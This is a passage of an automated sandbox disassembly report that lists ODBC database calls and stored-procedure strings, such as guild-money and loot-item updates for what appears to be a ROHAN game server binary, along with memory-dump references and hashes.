                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004280BD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004280F2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042812A
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_ChangeNGuildMaxMasterRank](?,?) } , xrefs: 00428075
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_ChangeNGuildMaxMasterRank](?,?) }
                                                                                      • API String ID: 0-2568157895
                                                                                      • Opcode ID: ed006571da27843b10860b9e7235093ebce8457f9d29a39159f42ad12d4449ce
                                                                                      • Instruction ID: 5a52fa689717c5f49c8bef03009627788e8b5640464a45649cada120d2b74c14
                                                                                      • Opcode Fuzzy Hash: ed006571da27843b10860b9e7235093ebce8457f9d29a39159f42ad12d4449ce
                                                                                      • Instruction Fuzzy Hash: 642133B1A80259ABEB20CF44CC46FAE7375EB44714F208389F7586E2D0DAB16D808F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetNGuildPostBox] (?, ?) } ,000000FD), ref: 00425100
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042513F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00425174
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004251AC
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetNGuildPostBox] (?, ?) } , xrefs: 004250F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetNGuildPostBox] (?, ?) }
                                                                                      • API String ID: 0-448873929
                                                                                      • Opcode ID: fd2f190ef048f07e039e9affe676ad86eae2cb4660784976956d9736d50a6d0e
                                                                                      • Instruction ID: 7737a6ec46eba65e1bf7a6376511749062bf01023691764fafcdc69ae97e1e47
                                                                                      • Opcode Fuzzy Hash: fd2f190ef048f07e039e9affe676ad86eae2cb4660784976956d9736d50a6d0e
                                                                                      • Instruction Fuzzy Hash: 1B21D6B1641214ABEB64CF54CC52FD97374EB48724F204289F7586E2C4D6B5AD908F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_UpdLootItem](?,?)},000000FD), ref: 0043617A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004361B9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004361EE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00436226
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_UpdLootItem](?,?)}, xrefs: 00436171
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_UpdLootItem](?,?)}
                                                                                      • API String ID: 0-1714460140
                                                                                      • Opcode ID: cc894e089ffa97a903ebbd1798a901a179e0494e407d28299e530e1359417c25
                                                                                      • Instruction ID: ef04d7c26d4ecb027bf489d6f2a157f7bbffa7f4f34e350ecd2925e14df0fc4b
                                                                                      • Opcode Fuzzy Hash: cc894e089ffa97a903ebbd1798a901a179e0494e407d28299e530e1359417c25
                                                                                      • Instruction Fuzzy Hash: 752112B4A58255ABEB24DF44CC52FED7375FB44718F204289F6186A2C0D7B16D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ConsignGetMoney] (?,?)},000000FD), ref: 00430157
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00430196
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004301CB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00430203
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ConsignGetMoney] (?,?)}, xrefs: 0043014E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ConsignGetMoney] (?,?)}
                                                                                      • API String ID: 0-46338952
                                                                                      • Opcode ID: 2f7b7197c7b0531d822f3d5a771e657c8299d44f477ac818be66ba29adb4f7b7
                                                                                      • Instruction ID: 5ed47ba1e7593657481050d5c1e74b6763dcd3cd672408e1710ea6caa93d5de3
                                                                                      • Opcode Fuzzy Hash: 2f7b7197c7b0531d822f3d5a771e657c8299d44f477ac818be66ba29adb4f7b7
                                                                                      • Instruction Fuzzy Hash: 7721ACB5E48218EBEB24CF54CD52FAA7374EB84714F208389F71C6A2C4D6B979408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN2_AddGuildMoney](?,?) } ,000000FD), ref: 0042815D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042819C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004281D1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00428209
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN2_AddGuildMoney](?,?) } , xrefs: 00428154
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN2_AddGuildMoney](?,?) }
                                                                                      • API String ID: 0-1912429240
                                                                                      • Opcode ID: 4d5fe97d7683a7a5e5de830d3d0ea6e9e838bbe389a10206258dc4e05d26ce84
                                                                                      • Instruction ID: 24c13fdcb2a1c0ad095543c6330835cd2b4c7300414bc924b3f497c195596c22
                                                                                      • Opcode Fuzzy Hash: 4d5fe97d7683a7a5e5de830d3d0ea6e9e838bbe389a10206258dc4e05d26ce84
                                                                                      • Instruction Fuzzy Hash: CA211570A8421B6BEB24CF44CC55FB9B374EB44754F2142A9F6246E2D4D6B169808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN2_AddNGuildMoney](?,?) } ,000000FD), ref: 0042823C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042827B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004282B0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004282E8
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN2_AddNGuildMoney](?,?) } , xrefs: 00428233
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN2_AddNGuildMoney](?,?) }
                                                                                      • API String ID: 0-1519001438
                                                                                      • Opcode ID: e15065ab8d65a5b211f975ced9df14c7f4e181cb1d5dd0dc7e2f6f4dd00d825e
                                                                                      • Instruction ID: 853fbcca4934ac644ad96f38d600bdd3dbf4bb9086d592ac4f07d20a03bb1281
                                                                                      • Opcode Fuzzy Hash: e15065ab8d65a5b211f975ced9df14c7f4e181cb1d5dd0dc7e2f6f4dd00d825e
                                                                                      • Instruction Fuzzy Hash: B12136B5645318ABEB25CF44CC62F997378EB84B14F208289F7546F2C1D6B56F808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN2_AddGuildPoint](?,?) } ,000000FD), ref: 0042831B
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042835A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042838F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004283C7
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN2_AddGuildPoint](?,?) } , xrefs: 00428312
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
